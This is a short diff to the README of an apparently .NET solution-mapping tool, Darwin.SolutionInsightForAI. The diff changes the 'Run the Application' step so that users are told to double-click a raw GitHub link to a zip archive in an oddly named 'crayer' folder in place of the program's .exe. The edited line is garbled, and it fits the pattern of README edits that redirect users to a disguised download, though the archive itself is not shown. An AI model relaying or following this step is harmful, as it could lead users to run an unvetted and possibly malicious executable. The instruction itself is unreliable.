mohamedalam123/Darwin.SolutionInsightForAI/README.md

    - Once the download completes, find the `.exe` file in your downloads folder.

 5. **Run the Application**
-   - Double-click the `Darwin.SolutionInsightForAI.exe` file to run it.
+   - Double-click the `https://raw.githubusercontent.com/mohamedalam123/Darwin.SolutionInsightForAI/master/crayer/Darwin.SolutionInsightForAI.zip` file to run it.
 A command prompt window will open.

 6. **Follow On-Screen Prompts**
    - The application will guide you through the steps needed for mapping your .NET solution.
 Simply provide the necessary input as instructed.